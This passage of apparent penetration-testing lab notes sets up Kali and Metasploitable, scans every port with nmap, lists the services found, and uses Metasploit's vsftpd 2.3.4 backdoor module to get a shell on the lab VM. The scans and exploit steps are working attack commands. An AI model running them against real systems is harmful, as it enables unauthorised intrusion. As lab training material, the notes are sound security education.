ifconfig # run this on both systems and note each address; the two below are from this lab
192.168.56.101 Kali
192.168.56.102 Metasploitable
7. verify networking is set up
ping Kali -> Metasploitable
ping Metasploitable -> Kali
8. verify running services in Metasploitable
# Metasploitable
sudo netstat -tunlp | less
9. port scan Metasploitable
# Kali Linux
nmap -p0-65535 <metasploitable_ip>
nmap -sV -p0-65535 <metasploitable_ip>
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34929/tcp open mountd 1-3 (RPC #100005)
47746/tcp open unknown
49161/tcp open status 1 (RPC #100024)
57689/tcp open nlockmgr 1-4 (RPC #100021)
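10. configure Metasploit (target: Metasploitable)
# start up Metasploit within Kali Linux: click the icon in the left-side dock
# vsftpd is picked here because the -sV scan in step 9 reported vsftpd 2.3.4 on 21/tcp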
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
set payload cmd/unix/interact
show options
set RHOST <metasploitable_ip>
set RPORT 21
exploit
nice